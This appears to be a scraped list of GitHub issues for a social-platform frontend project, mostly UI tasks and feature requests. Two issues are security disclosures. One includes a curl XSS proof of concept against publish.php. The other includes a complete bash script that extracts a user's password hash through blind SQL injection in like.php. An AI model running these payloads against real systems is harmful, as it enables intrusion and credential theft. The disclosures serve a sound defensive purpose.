codeuino / social-platform-donut-frontend Goto Github PK

To make the front-end of a feed-page to show articles, projects, events, blog, communities etc.

As of now we are not showing image of the popular project.
You need to add the project image before project name which is in blue.

create an authentication for login with Facebook. It's already done with google and GitHub(refer that). Follow the folder structure and pull code from development branch and send the PR to same branch.

Need a great UX for the landing page after the user logs in

Hello Everyone, My name is Yashwanth, from IIT Bhubaneswar,India. I have good knowledge in HTML,CSS, Java Script,Python,Java. I am specialized in Machine Learning,Deep Learning and Data Analytics. I am planning to apply GSOC 2019 with Codeuino. I need help to get started with. Assign me some task/sub goal to get started to work and contribute codeuino. Thankyou!

There are few typos in Readme which need to be removed, especially in the "What is Donut?" part.

Code base is not tested.
use mocha to test codebase

Display the timestamp.

Come up with a solution to show popular project
Must be the ratio of number of likes/number of dislikes:- max of this will most popular one

The box below (1,1,comment,share)is simple textarea. Try to improve it and after submitting a comment it should be displayed in a card format.Only focus on design of comment box rather than submit logic.

For example: https://frappe.io/charts

New UI of landing page

Add a signup button for gmail and github

If you start server and try to scroll page,whole section of proposed project and and open source events also get scrolled.
Make those 2 fixed and move open source event to left of feeds.

BUG
I cannot scroll over in tablet or mobile view.
Is this some issue or done intentionally for some reason.

I will be taking up this issue

A lot of the code in the repository is not formatted and the routes are not properly commented which becomes difficult for a new user to navigate.

I would like to a format and comment the code part by part.

For this, you can take inspiration from Github tags, also you free to show your creativity in this.
You can also produce 2-3 variations if you want.

A front-end of discussion portal for the members to discuss on various topics to be integrated with the front-end of the feed-page.

As of now the content is not the main highlighted part of the feed, take make it look better you can have a look at other social media platforms.

The codeuino title overflows from the side.

Feature Suggestion

Dependabot is a special bot on github which can update dependencies by adding pr in the project and configuring it can create a better experience for other developers to add pr and issues in the organization.

Though implement this bot on Donut project, though I really like idea behind it @jaskirat2000 :) .

https://dependabot.com/ for more information.

As of now the alignment of image(user profile pic) and the name of the user and the designation is not proper.
Also, the profile pic is in square shape as now, change to circular one.

Try to change the navbar of donut from former to latter

After the updation of the front-end landing page, We need to connect the front-end buttons and all the links with the respective back-end rest point present.

Screenshots are not updated.

The route to publish a project is made but no html page is made.
Suggestions for design are appreciated.

Fix the Social login button present on the dashboard, backend api is already linked. You have to fix the styles and make sure user is able to click them.

To update the README with the new UI.

Current logic in O(n)^2 make it O(1) by using maps instead of arrays

I am getting the follwoing error when I run npm install --save:

Please include the following file with any support request:
npm ERR! /home/username/Social-Platform-Donut/npm-debug.log

modifying readme a bit.
There are a lot fo npm install commands. All this can be done by simplying typing npm install inside the directory of the project. So a simple change in readme can make it cleaner. :D

This issue can be taken up by anyone.
Cheers!

Hi Developers,

you do not sanitize the 5 $_POST variables username,contentname,tagline,content, and genre against XSS vectors in publish.php when inserting new articles in the database. This can lead to different harmfull actions performed against users by injected code. You should consider applying filter functions similar to the attached patch.
patch.txt
Note that this patch does filter all HTML tags..what might not be an option for you as you use an editor that produces HTML tags. However there are solutions for these cases too, e.g.: HTML Purifier(http://htmlpurifier.org/)

POC:
This will insert a malicious XSS code inside each of the mentioned fields with the username of user shown as author and does not even require authentication.
$ curl -d "username=user'#\"><script>alert('usr');</script><a href=\"#&contentname=<script>alert('title');</script>&tagline=<script>alert('tags');</script>&content=<script>alert('content');</script>&<script>alert('gen');</script>" -X POST http://localhost/Social-Platform-Donut/596841401/publish.php

Further, you should consider authenticating the user and the calling script before processing POST requests in general and reading static contents from storage when accessible instead of passing and reading them from easily alterable request parameters.

Hi Developers,

you do not sanitize the two $_POST variables article and username when performing Like and Dislike actions in like.php and dislikes.php. This can be misused to modify your used SQL queries. You can prevent the risk by filtering the two variables before using them as in the following patch:
patch.txt

POC:
The vulnerabilities can i.a. be used to read content from the database in a Blind SQL Injection manner. The following code extracts the password hash of the user "user" by bruteforcing each character using a SQL Injection in like.php:
( We assume an article with id=0 exists and was not yet liked by a user "user", note that we could simply create an article as unauthenticated user for this purpose: see #5 )

#!/bin/bash
URL="http://localhost/Social-Platform-Donut/596841401/like.php"
USERNAME="user"    # any name
ARTICLE=0          # the article id
ASCII_DEC=($(seq 0 0; seq 32 126))    # list of ascii char codes
FIELD="password"         # the field we are extracting the content of
TABLE="users"            # the table we are extracting the content of
WHERE="username='user'"  # where clause for extracting
VALUE=""
# initial like entry
PREV=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}" -X POST "${URL}")
i=1     # substring index
j=0     # char code index
while true; do
	c=${ASCII_DEC[$j]}
        # query that will eval to true or false -> control like add or remove
	QUERY="' AND '${c}'=ASCII(SUBSTRING((SELECT ${FIELD} FROM ${TABLE} WHERE ${WHERE}),${i},1)) AND '1'='1"
	RES=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}${QUERY}" -X POST "${URL}")
	if [ $RES -lt $PREV ]; then
		if [ $c -eq 0 ]; then
			echo "found ${VALUE} for SELECT ${FIELD} FROM ${TABLE} WHERE ${WHERE}"
			exit
		fi
		VALUE=$(printf "${VALUE}\x$(printf %x ${c})")    # store found chars
		i=$((${i}+1))    # extract next char
		# reset
		j=0
		curl -s -d "article=${ARTICLE}&username=${USERNAME}' AND '1'='1" -X POST "${URL}" 1>/dev/null
		RES=$(curl -s -d "article=${ARTICLE}&username=${USERNAME}' AND '1'='0" -X POST "${URL}")
	else
		j=$((${j}+1))         # try next char code
	fi
	PREV="${RES}"
done

Further, you should consider authenticating the user and the calling script before processing POST requests in general and reading static contents from storage when accessible instead of passing and reading them from easily alterable request parameters.

Making new wireframes for the feedback page

The current color theme of Donut is black and white.
We want to design a night theme for platform.
Provide good suggestions and work on it to improve UI.

Remove the change button and add a single button to change all the fields once clicked on button all fields should be editable and button should change to 'save'.

To understand this - have a look at facebook comment button.

Also, make it look like facebook comment button.

When you press the button then the comments are loaded.

Also, implement the view more functionality.

Make a fronted Community ( Organisation ) dashboard for this Platform.

Just like we have dashboard in LinkedIn, Twitter, Facebook etc for the organisation to make an do changes.

So this has to be made in this way:
Reference to these examples:
https://goo.gl/images/6i4dC6
https://goo.gl/images/kLk3rM
https://goo.gl/images/qrtmm1

It should include what all things are required in the dashboard for a community

The front end and backend of platform is not integrated.
It is important to integrate for version 1.

For inspiration have a look at twitter posts, where the number of likes and shares and comments are written beside the button. We need to have similar buttons.

As of now, it looks like this: